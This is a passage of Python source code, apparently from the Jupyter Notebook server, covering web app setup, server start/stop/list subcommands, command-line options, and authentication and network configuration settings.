_examples = """
jupyter notebook # start the notebook
jupyter notebook --certfile=mycert.pem # use SSL/TLS certificate
jupyter notebook password # enter a password to protect the server
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
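# A worked example of the docstring above: random_ports(8888, 8) yields
# 8888, 8889, 8890, 8891, 8892 first, then 3 ports drawn at random from
# [8888 - 16, 8888 + 16] (i.e. [port - 2*n, port + 2*n]), clamped to >= 1.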
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services, log,
base_url, default_url, settings_overrides, jinja_env_options):
settings = self.init_settings(
jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager, config_manager,
extra_services, log, base_url,
default_url, settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
if settings['autoreload']:
log.info('Autoreload enabled: the webapp will restart when any Python src file changes.')
super().__init__(handlers, **settings)
def init_settings(self, jupyter_app, kernel_manager, contents_manager,
session_manager, kernel_spec_manager,
config_manager, extra_services,
log, base_url, default_url, settings_overrides,
jinja_env_options=None):
_template_path = settings_overrides.get(
"template_path",
jupyter_app.template_file_path,
)
if isinstance(_template_path, py3compat.string_types):
_template_path = (_template_path,)
template_path = [os.path.expanduser(path) for path in _template_path]
jenv_opt = {"autoescape": True}
jenv_opt.update(jinja_env_options if jinja_env_options else {})
env = Environment(loader=FileSystemLoader(template_path), extensions=['jinja2.ext.i18n'], **jenv_opt)
sys_info = get_sys_info()
# If the user is running the notebook in a git directory, make the assumption
# that this is a dev install and suggest to the developer `npm run build:watch`.
base_dir = os.path.realpath(os.path.join(__file__, '..', '..'))
dev_mode = os.path.exists(os.path.join(base_dir, '.git'))
nbui = gettext.translation('nbui', localedir=os.path.join(base_dir, 'notebook/i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
if dev_mode:
DEV_NOTE_NPM = """It looks like you're running the notebook from source.
If you're working on the Javascript of the notebook, try running
%s
in another terminal window to have the system incrementally
watch and build the notebook's JavaScript for you, as you make changes.""" % 'npm run build:watch'
log.info(DEV_NOTE_NPM)
if sys_info['commit_source'] == 'repository':
# don't cache (rely on 304) when working from master
version_hash = ''
else:
# reset the cache on server restart
version_hash = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
if jupyter_app.ignore_minified_js:
log.warning(_("""The `ignore_minified_js` flag is deprecated and no longer works."""))
log.warning(_("""Alternatively use `%s` when working on the notebook's Javascript and LESS""") % 'npm run build:watch')
warnings.warn(_("The `ignore_minified_js` flag is deprecated and will be removed in Notebook 6.0"), DeprecationWarning)
now = utcnow()
root_dir = contents_manager.root_dir
home = py3compat.str_to_unicode(os.path.expanduser('~'), encoding=sys.getfilesystemencoding())
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
# Use the NotebookApp logger and its formatting for tornado request logging.
log_function = functools.partial(
log_request, log=log, log_json=jupyter_app.log_json)
settings = dict(
# basics
log_function=log_function,
base_url=base_url,
default_url=default_url,
template_path=template_path,
static_path=jupyter_app.static_file_path,
static_custom_path=jupyter_app.static_custom_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_url,'/static/'),
static_handler_args = {
# don't cache custom.js
'no_cache_paths': [url_path_join(base_url, 'static', 'custom')],
},
version_hash=version_hash,
ignore_minified_js=jupyter_app.ignore_minified_js,
# rate limits
iopub_msg_rate_limit=jupyter_app.iopub_msg_rate_limit,
iopub_data_rate_limit=jupyter_app.iopub_data_rate_limit,
rate_limit_window=jupyter_app.rate_limit_window,
# authentication
cookie_secret=jupyter_app.cookie_secret,
login_url=url_path_join(base_url,'/login'),
login_handler_class=jupyter_app.login_handler_class,
logout_handler_class=jupyter_app.logout_handler_class,
password=jupyter_app.password,
xsrf_cookies=True,
disable_check_xsrf=jupyter_app.disable_check_xsrf,
allow_remote_access=jupyter_app.allow_remote_access,
local_hostnames=jupyter_app.local_hostnames,
authenticate_prometheus=jupyter_app.authenticate_prometheus,
# managers
kernel_manager=kernel_manager,
contents_manager=contents_manager,
session_manager=session_manager,
kernel_spec_manager=kernel_spec_manager,
config_manager=config_manager,
# handlers
extra_services=extra_services,
# Jupyter stuff
started=now,
# place for extensions to register activity
# so that they can prevent idle-shutdown
last_activity_times={},
jinja_template_vars=jupyter_app.jinja_template_vars,
nbextensions_path=jupyter_app.nbextensions_path,
websocket_url=jupyter_app.websocket_url,
mathjax_url=jupyter_app.mathjax_url,
mathjax_config=jupyter_app.mathjax_config,
shutdown_button=jupyter_app.quit_button,
config=jupyter_app.config,
config_dir=jupyter_app.config_dir,
allow_password_change=jupyter_app.allow_password_change,
server_root_dir=root_dir,
jinja2_env=env,
terminals_available=terminado_available and jupyter_app.terminals_enabled,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
"""Load the (URL pattern, handler) tuples for each component."""
# Order matters. The first handler to match the URL will handle the request.
handlers = []
# load extra services specified by users before default handlers
for service in settings['extra_services']:
handlers.extend(load_handlers(service))
handlers.extend(load_handlers('notebook.tree.handlers'))
handlers.extend([(r"/login", settings['login_handler_class'])])
handlers.extend([(r"/logout", settings['logout_handler_class'])])
handlers.extend(load_handlers('notebook.files.handlers'))
handlers.extend(load_handlers('notebook.view.handlers'))
handlers.extend(load_handlers('notebook.notebook.handlers'))
handlers.extend(load_handlers('notebook.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.bundler.handlers'))
handlers.extend(load_handlers('notebook.kernelspecs.handlers'))
handlers.extend(load_handlers('notebook.edit.handlers'))
handlers.extend(load_handlers('notebook.services.api.handlers'))
handlers.extend(load_handlers('notebook.services.config.handlers'))
handlers.extend(load_handlers('notebook.services.contents.handlers'))
handlers.extend(load_handlers('notebook.services.sessions.handlers'))
handlers.extend(load_handlers('notebook.services.nbconvert.handlers'))
handlers.extend(load_handlers('notebook.services.security.handlers'))
handlers.extend(load_handlers('notebook.services.shutdown'))
handlers.extend(load_handlers('notebook.services.kernels.handlers'))
handlers.extend(load_handlers('notebook.services.kernelspecs.handlers'))
handlers.extend(settings['contents_manager'].get_extra_handlers())
# If gateway mode is enabled, replace appropriate handlers to perform redirection
if GatewayClient.instance().gateway_enabled:
# for each handler required for gateway, locate its pattern
# in the current list and replace that entry...
gateway_handlers = load_handlers('notebook.gateway.handlers')
for i, gwh in enumerate(gateway_handlers):
for j, h in enumerate(handlers):
if gwh[0] == h[0]:
handlers[j] = (gwh[0], gwh[1])
break
handlers.append(
(r"/nbextensions/(.*)", FileFindHandler, {
'path': settings['nbextensions_path'],
'no_cache_paths': ['/'], # don't cache anything in nbextensions
}),
)
handlers.append(
(r"/custom/(.*)", FileFindHandler, {
'path': settings['static_custom_path'],
'no_cache_paths': ['/'], # don't cache anything in custom
})
)
# register base handlers last
handlers.extend(load_handlers('notebook.base.handlers'))
# set the URL that will be redirected from `/`
handlers.append(
(r'/?', RedirectWithParams, {
'url' : settings['default_url'],
'permanent': False, # want 302, not 301
})
)
# prepend base_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(settings['base_url'], handler[0])
new_handler = tuple([pattern] + list(handler[1:]))
new_handlers.append(new_handler)
# add 404 on the end, which will catch everything that falls through
new_handlers.append((r'(.*)', Template404))
return new_handlers
def last_activity(self):
"""Get a UTC timestamp for when the server last did something.
Includes: API activity, kernel activity, kernel shutdown, and terminal
activity.
"""
sources = [
self.settings['started'],
self.settings['kernel_manager'].last_kernel_activity,
]
try:
sources.append(self.settings['api_last_activity'])
except KeyError:
pass
try:
sources.append(self.settings['terminal_last_activity'])
except KeyError:
pass
sources.extend(self.settings['last_activity_times'].values())
return max(sources)
class NotebookPasswordApp(JupyterApp):
"""Set a password for the notebook server.
Setting a password secures the notebook server
and removes the need for token-based authentication.
"""
description = __doc__
def _config_file_default(self):
return os.path.join(self.config_dir, 'jupyter_notebook_config.json')
def start(self):
from .auth.security import set_password
set_password(config_file=self.config_file)
self.log.info("Wrote hashed password to %s" % self.config_file)
def shutdown_server(server_info, timeout=5, log=None):
"""Shutdown a notebook server in a separate process.
*server_info* should be a dictionary as produced by list_running_servers().
Will first try to request shutdown using /api/shutdown .
On Unix, if the server is still running after *timeout* seconds, it will
send SIGTERM. After another timeout, it escalates to SIGKILL.
Returns True if the server was stopped by any means, False if stopping it
failed (on Windows).
"""
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPClient, HTTPRequest
from tornado.netutil import Resolver
url = server_info['url']
pid = server_info['pid']
resolver = None
# UNIX Socket handling.
if url.startswith('http+unix://'):
# This library doesn't understand our URI form, but it's just HTTP.
url = url.replace('http+unix://', 'http://')
class UnixSocketResolver(Resolver):
def initialize(self, resolver):
self.resolver = resolver
def close(self):
self.resolver.close()
@gen.coroutine
def resolve(self, host, port, *args, **kwargs):
raise gen.Return([
(socket.AF_UNIX, urldecode_unix_socket_path(host))
])
resolver = UnixSocketResolver(resolver=Resolver())
req = HTTPRequest(url + 'api/shutdown', method='POST', body=b'', headers={
'Authorization': 'token ' + server_info['token']
})
if log: log.debug("POST request to %sapi/shutdown", url)
AsyncHTTPClient.configure(None, resolver=resolver)
HTTPClient(AsyncHTTPClient).fetch(req)
# Poll to see if it shut down.
for _ in range(timeout*10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if sys.platform.startswith('win'):
return False
if log: log.debug("SIGTERM to PID %s", pid)
os.kill(pid, signal.SIGTERM)
# Poll to see if it shut down.
for _ in range(timeout * 10):
if not check_pid(pid):
if log: log.debug("Server PID %s is gone", pid)
return True
time.sleep(0.1)
if log: log.debug("SIGKILL to PID %s", pid)
os.kill(pid, signal.SIGKILL)
return True # SIGKILL cannot be caught
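# A minimal usage sketch (hypothetical port value; list_running_servers() is
# defined later in this module and yields dicts with 'url', 'pid', 'port' and
# 'token' keys, as written by the running server):
#
#     for info in list_running_servers():
#         if info.get('port') == 8888:
#             shutdown_server(info, timeout=5)  # /api/shutdown, then SIGTERM/SIGKILL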
class NbserverStopApp(JupyterApp):
version = __version__
description="Stop currently running notebook server."
port = Integer(DEFAULT_NOTEBOOK_PORT, config=True,
help="Port of the server to be killed. Default %s" % DEFAULT_NOTEBOOK_PORT)
sock = Unicode(u'', config=True,
help="UNIX socket of the server to be killed.")
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
try:
self.port = int(self.extra_args[0])
except ValueError:
# self.extra_args[0] was not an int, so it must be a string (unix socket).
self.sock = self.extra_args[0]
def shutdown_server(self, server):
return shutdown_server(server, log=self.log)
def _shutdown_or_exit(self, target_endpoint, server):
print("Shutting down server on %s..." % target_endpoint)
server_stopped = self.shutdown_server(server)
if not server_stopped and sys.platform.startswith('win'):
# the pid check on Windows appears to be unreliable, so fetch a fresh
# list of servers and confirm that ours is no longer present before
# reporting that the stop failed.
servers = list(list_running_servers(self.runtime_dir))
if server not in servers:
server_stopped = True
if not server_stopped:
sys.exit("Could not stop server on %s" % target_endpoint)
@staticmethod
def _maybe_remove_unix_socket(socket_path):
try:
os.unlink(socket_path)
except (OSError, IOError):
pass
def start(self):
servers = list(list_running_servers(self.runtime_dir))
if not servers:
self.exit("There are no running servers (per %s)" % self.runtime_dir)
for server in servers:
if self.sock:
sock = server.get('sock', None)
if sock and sock == self.sock:
self._shutdown_or_exit(sock, server)
# Attempt to remove the UNIX socket after stopping.
self._maybe_remove_unix_socket(sock)
return
elif self.port:
port = server.get('port', None)
if port == self.port:
self._shutdown_or_exit(port, server)
return
else:
current_endpoint = self.sock or self.port
print(
"There is currently no server running on {}".format(current_endpoint),
file=sys.stderr
)
print("Ports/sockets currently in use:", file=sys.stderr)
for server in servers:
print(" - {}".format(server.get('sock') or server['port']), file=sys.stderr)
self.exit(1)
class NbserverListApp(JupyterApp):
version = __version__
description=_("List currently running notebook servers.")
flags = dict(
jsonlist=({'NbserverListApp': {'jsonlist': True}},
_("Produce machine-readable JSON list output.")),
json=({'NbserverListApp': {'json': True}},
_("Produce machine-readable JSON object on each line of output.")),
)
jsonlist = Bool(False, config=True,
help=_("If True, the output will be a JSON list of objects, one per "
"active notebook server, each with the details from the "
"relevant server info file."))
json = Bool(False, config=True,
help=_("If True, each line of output will be a JSON object with the "
"details from the server info file. For a JSON list output, "
"see the NbserverListApp.jsonlist configuration value"))
def start(self):
serverinfo_list = list(list_running_servers(self.runtime_dir))
if self.jsonlist:
print(json.dumps(serverinfo_list, indent=2))
elif self.json:
for serverinfo in serverinfo_list:
print(json.dumps(serverinfo))
else:
print("Currently running servers:")
for serverinfo in serverinfo_list:
url = serverinfo['url']
if serverinfo.get('token'):
url = url + '?token=%s' % serverinfo['token']
print(url, "::", serverinfo['notebook_dir'])
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
_("Don't open the notebook in a browser after startup.")
)
flags['pylab']=(
{'NotebookApp' : {'pylab' : 'warn'}},
_("DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.")
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['allow-root']=(
{'NotebookApp' : {'allow_root' : True}},
_("Allow the notebook to be run from root user.")
)
flags['autoreload'] = (
{'NotebookApp': {'autoreload': True}},
"""Autoreload the webapp
Enable reloading of the tornado webapp and all imported Python packages
when any changes are made to any Python src files in Notebook or
extensions.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileContentsManager.save_script',
'DEPRECATED, IGNORED',
'DEPRECATED, IGNORED'))
aliases = dict(base_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'sock': 'NotebookApp.sock',
'sock-mode': 'NotebookApp.sock_mode',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'client-ca': 'NotebookApp.client_ca',
'notebook-dir': 'NotebookApp.notebook_dir',
'browser': 'NotebookApp.browser',
'pylab': 'NotebookApp.pylab',
'gateway-url': 'GatewayClient.url',
})
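# For illustration, the aliases and flags above mean that a command line such as
#
#     jupyter notebook --port=8889 --no-browser --notebook-dir=/tmp/nb
#
# is shorthand for setting NotebookApp.port, NotebookApp.open_browser and
# NotebookApp.notebook_dir (the /tmp/nb path is only an example value).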
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(JupyterApp):
name = 'jupyter-notebook'
version = __version__
description = _("""The Jupyter HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an HTML5/Javascript Notebook client.""")
examples = _examples
aliases = aliases
flags = flags
classes = [
KernelManager, Session, MappingKernelManager, KernelSpecManager,
ContentsManager, FileContentsManager, NotebookNotary,
GatewayKernelManager, GatewayKernelSpecManager, GatewaySessionManager, GatewayClient,
]
if terminado_available: # Only necessary when terminado is available
classes.append(TerminalManager)
flags = Dict(flags)
aliases = Dict(aliases)
subcommands = dict(
list=(NbserverListApp, NbserverListApp.description.splitlines()[0]),
stop=(NbserverStopApp, NbserverStopApp.description.splitlines()[0]),
password=(NotebookPasswordApp, NotebookPasswordApp.description.splitlines()[0]),
)
_log_formatter_cls = LogFormatter
_json_logging_import_error_logged = False
log_json = Bool(False, config=True,
help=_('Set to True to enable JSON formatted logs. '
'Run "pip install notebook[json-logging]" to install the '
'required dependent packages. Can also be set using the '
'environment variable JUPYTER_ENABLE_JSON_LOGGING=true.')
)
@default('log_json')
def _default_log_json(self):
"""Get the log_json value from the environment."""
return os.getenv('JUPYTER_ENABLE_JSON_LOGGING', 'false').lower() == 'true'
@validate('log_json')
def _validate_log_json(self, proposal):
# If log_json=True, see if the json_logging package can be imported and
# override _log_formatter_cls if so.
value = proposal['value']
if value:
try:
import json_logging
self.log.debug('initializing json logging')
json_logging.init_non_web(enable_json=True)
self._log_formatter_cls = json_logging.JSONLogFormatter
except ImportError:
# If configured for json logs and we can't do it, log a hint.
# Only log the error once though.
if not self._json_logging_import_error_logged:
self.log.warning(
'Unable to use json logging due to missing packages. '
'Run "pip install notebook[json-logging]" to fix.'
)
self._json_logging_import_error_logged = True
value = False
return value
@default('log_level')
def _default_log_level(self):
return logging.INFO
@default('log_datefmt')
def _default_log_datefmt(self):
"""Exclude date from default date format"""
return "%H:%M:%S"
@default('log_format')
def _default_log_format(self):
"""override default log format to include time"""
return u"%(color)s[%(levelname)1.1s %(asctime)s.%(msecs).03d %(name)s]%(end_color)s %(message)s"
ignore_minified_js = Bool(False,
config=True,
        help=_('Deprecated: Use minified JS file or not, mainly used during development to avoid JS recompilation'),
)
# file to be opened in the notebook server
file_to_run = Unicode('', config=True)
# Network related information
allow_origin = Unicode('', config=True,
help="""Set the Access-Control-Allow-Origin header
Use '*' to allow any origin to access your server.
Takes precedence over allow_origin_pat.
"""
)
allow_origin_pat = Unicode('', config=True,
help="""Use a regular expression for the Access-Control-Allow-Origin header
Requests from an origin matching the expression will get replies with:
Access-Control-Allow-Origin: origin
where `origin` is the origin of the request.
Ignored if allow_origin is set.
"""
)
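    # Illustrative note (hypothetical origins, not part of the upstream source): to accept
    # CORS requests from a single origin or from any subdomain of example.org, one could
    # put either of these in jupyter_notebook_config.py:
    #
    #   c.NotebookApp.allow_origin = 'https://nb.example.org'         # exact origin
    #   c.NotebookApp.allow_origin_pat = r'https://.*\.example\.org'  # regex; ignored if allow_origin is set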
allow_credentials = Bool(False, config=True,
help=_("Set the Access-Control-Allow-Credentials: true header")
)
allow_root = Bool(False, config=True,
help=_("Whether to allow the user to run the notebook as root.")
)
use_redirect_file = Bool(True, config=True,
help="""Disable launching browser by redirect file
        For versions of notebook > 5.7.2, a security measure was added that
        prevents the authentication token used to launch the browser from being visible.
        This feature makes it difficult for other users on a multi-user system to
        run code in your Jupyter session as you.
        However, in some environments (like Windows Subsystem for Linux (WSL) and Chromebooks),
        launching a browser using a redirect file can lead to the browser failing to load.
        This is because of the difference in file structures/paths between the runtime and
        the browser.
        Setting this to False will disable this behavior, allowing the browser
        to launch by using a URL and a visible token (as before).
"""
)
autoreload = Bool(False, config=True,
help= ("Reload the webapp when changes are made to any Python src files.")
)
default_url = Unicode('/tree', config=True,
help=_("The default URL to redirect to from `/`")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on.")
)
@default('ip')
def _default_ip(self):
"""Return localhost if available, 127.0.0.1 otherwise.
On some (horribly broken) systems, localhost cannot be bound.
"""
s = socket.socket()
try:
s.bind(('localhost', 0))
except socket.error as e:
self.log.warning(_("Cannot bind to localhost, using 127.0.0.1 as default ip\n%s"), e)
return '127.0.0.1'
else:
s.close()
return 'localhost'
@validate('ip')
def _validate_ip(self, proposal):
value = proposal['value']
if value == u'*':
value = u''
return value
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example).""")
)
port_env = 'JUPYTER_PORT'
port_default_value = DEFAULT_NOTEBOOK_PORT
port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
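    # Illustrative note (hypothetical socket path, not part of the upstream source):
    # listening on a UNIX socket instead of a TCP port, with the user-only permissions
    # that the validator above enforces:
    #
    #   jupyter notebook --sock=/tmp/notebook.sock --sock-mode=0600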
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
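    # Illustrative note (hypothetical values, not part of the upstream source): instead of
    # letting the server generate a token, it can be supplied explicitly:
    #
    #   JUPYTER_TOKEN=my-secret-token jupyter notebook
    #   JUPYTER_TOKEN_FILE=/run/secrets/jupyter-token jupyter notebook
    #
    # Setting c.NotebookApp.token = '' disables token authentication entirely, which the
    # help text above flags as NOT RECOMMENDED.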
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
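    # Illustrative note (not part of the upstream source): generating a hashed password
    # and wiring it into the config, as described in the help text above:
    #
    #   >>> from notebook.auth import passwd
    #   >>> passwd('s3cret')          # returns e.g. 'sha1:<salt>:<hash>'
    #
    # and then, in jupyter_notebook_config.py:
    #
    #   c.NotebookApp.password = 'sha1:<salt>:<hash>'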
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
        When logging in with a token, the notebook server UI will give the user the
        opportunity to set a new password at the same time, which will then replace
        the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
        The check protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
